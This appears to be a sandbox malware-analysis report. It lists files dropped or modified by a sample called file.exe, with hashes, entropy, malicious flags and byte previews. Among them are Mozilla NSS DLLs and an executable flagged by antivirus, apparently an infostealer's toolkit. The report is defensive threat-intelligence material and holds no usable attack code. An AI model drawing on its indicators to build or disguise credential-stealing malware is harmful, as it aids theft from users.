SHA-512:	0DA18A191F395CA755F4B183A44206E8D66DEBF11783DDCAB8083B9C224CC93A0BF3B13D3260AB124D3E84F833B4506D1983CD2DCD76CC691068B8AB33BE1E30
Malicious:	false
Preview:	...@..@...@.....C.].....@................e...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pfqgsn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........9......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.0984945491284295
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
MD5:	AFAC5E4CC1213807ACB7D1A0F61BCF99
SHA1:	FEDCA0A829A0DBCCD1E9D7048398372FF9604783
SHA-256:	FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
SHA-512:	44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
Malicious:	false
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:NYLFRQZ:ap2Z
MD5:	B64BD80D877645C2DD14265B1A856F8A
SHA1:	F7379E1A6F8CE062E891C56736C789C7EA77CD6A
SHA-256:	83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
SHA-512:	734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:	false
Preview:	117.0.2045.55

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.0897499588404616
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kW0di1zNtPMpkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynYWkzItSmd6qE7lFoC
MD5:	18E1D869886288B3650E72792F51D94E
SHA1:	D630AC0CD91EA750B94E9D2E10898667FD650331
SHA-256:	9A5A26DB677D4A4B82D1D8B99582895712FE0BD1A55034B63FA1E4D63E7AAC21
SHA-512:	21DE97B0F3990D9B2FD1790AFC3536DB6B5BE1ED82BBD08317D67F87A884CC47EC91BA7031DA9320D58947573B5AFEE86236069D0AE7D515C9303ABF450E3CB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a615.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.0897499588404616
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kW0di1zNtPMpkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynYWkzItSmd6qE7lFoC
MD5:	18E1D869886288B3650E72792F51D94E
SHA1:	D630AC0CD91EA750B94E9D2E10898667FD650331
SHA-256:	9A5A26DB677D4A4B82D1D8B99582895712FE0BD1A55034B63FA1E4D63E7AAC21
SHA-512:	21DE97B0F3990D9B2FD1790AFC3536DB6B5BE1ED82BBD08317D67F87A884CC47EC91BA7031DA9320D58947573B5AFEE86236069D0AE7D515C9303ABF450E3CB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a624.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.0897499588404616
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kW0di1zNtPMpkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynYWkzItSmd6qE7lFoC
MD5:	18E1D869886288B3650E72792F51D94E
SHA1:	D630AC0CD91EA750B94E9D2E10898667FD650331
SHA-256:	9A5A26DB677D4A4B82D1D8B99582895712FE0BD1A55034B63FA1E4D63E7AAC21
SHA-512:	21DE97B0F3990D9B2FD1790AFC3536DB6B5BE1ED82BBD08317D67F87A884CC47EC91BA7031DA9320D58947573B5AFEE86236069D0AE7D515C9303ABF450E3CB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b036.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.0897499588404616
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kW0di1zNtPMpkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynYWkzItSmd6qE7lFoC
MD5:	18E1D869886288B3650E72792F51D94E
SHA1:	D630AC0CD91EA750B94E9D2E10898667FD650331
SHA-256:	9A5A26DB677D4A4B82D1D8B99582895712FE0BD1A55034B63FA1E4D63E7AAC21
SHA-512:	21DE97B0F3990D9B2FD1790AFC3536DB6B5BE1ED82BBD08317D67F87A884CC47EC91BA7031DA9320D58947573B5AFEE86236069D0AE7D515C9303ABF450E3CB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQp:YQ3Kq9X0dMgAEiLIj
MD5:	8549C255650427D618EF18B14DFD2B56
SHA1:	8272585186777B344DB3960DF62B00F570D247F6
SHA-256:	40395D9CA4B65D48DEAC792844A77D4F8051F1CEF30DF561DACFEEED3C3BAE13
SHA-512:	E5BB8A0AD338372635C3629E306604E3DC5A5C26FB5547A3DD7E404E5261630612C07326E7EBF5B47ABAFADE8E555965A1A59A1EECFC496DCDD5003048898A8C
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a3a711c4-5593-45e6-8943-4c60a4b4dabf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44937
Entropy (8bit):	6.095320796769387
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWwQi1zNt+89dj9h43+TsCQFD0oKJDSgzMMd6qD47uC:+/Ps+wsI7ynBV0KtSmd6qE7lFoC
MD5:	77BA71847D0040526B287981B32B869B
SHA1:	2C82F637F4E5B2F04167F4E558CF54973E682EAB
SHA-256:	13966746ACC8CCF5B19CBD3E5DE7E2DC35DDA0E34E570FD0357088501BE2BB01
SHA-512:	007EB79C537DC49C3EBA4C6DAAA3B1884425430BFD75B9A948668E9CE9EC7F4EC94E436FA64D88AF1E8F4462A91A87C4E16DDE3FF7B5885A7AA6FBD9BAFE61BA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f11ad4de-4f76-4b53-bff2-ab970f96e0dc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44937
Entropy (8bit):	6.095320796769387
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWwQi1zNt+89dj9h43+TsCQFD0oKJDSgzMMd6qD47uC:+/Ps+wsI7ynBV0KtSmd6qE7lFoC
MD5:	77BA71847D0040526B287981B32B869B
SHA1:	2C82F637F4E5B2F04167F4E558CF54973E682EAB
SHA-256:	13966746ACC8CCF5B19CBD3E5DE7E2DC35DDA0E34E570FD0357088501BE2BB01
SHA-512:	007EB79C537DC49C3EBA4C6DAAA3B1884425430BFD75B9A948668E9CE9EC7F4EC94E436FA64D88AF1E8F4462A91A87C4E16DDE3FF7B5885A7AA6FBD9BAFE61BA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3191808
Entropy (8bit):	6.684358974572999
Encrypted:	false
SSDEEP:	49152:fMv3wY2bOjNNcJ9B4R1gcJrcyyh+0I5T3iczkc9Gzq1f:0PgbiNN2fUgcJrcyyhtIZScz3I
MD5:	5CC1E2DF8F03CC33A15DDE12361499CF
SHA1:	7C69C2D8882915CF9DAC2574CDB52B7510FEB46C
SHA-256:	C9DE766681ADA475273559581AAF0DAA3D4B855D4EF9D4BF30F25C99171351E9
SHA-512:	214CFF1838C09D951534BD14B5C65C9164CDAA55FCE85DA01E76A0ED730D0EB10D0CE80B1BBDC0C6892F3E252E2623D5ABF7E58229826434906FAE8412241C69
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0.......0...@.................................W...k.............................0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...akyzlcoy..*.......).................@...zjlmqufv......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.37431082302365
Encrypted:	false
SSDEEP:	48:SfNaoQ73VTEQ7r/fNaoQuhrhFQuWfNaoQyedQyDfNaoQSnhx0UrU0U8QS38:6NnQ5TEQfNnQuhrhFQu+NnQ3dQmNnQqq
MD5:	3EDB87A3DBC60AF3DBE351CDA9177D2D
SHA1:	0249528B0DC4C93E37AE552A9654ACF1DB2ED41A
SHA-256:	E30228F9DB248D909C41DC56B05ECE24F73540B55B7612B6DCC98C6ECA1B62F2
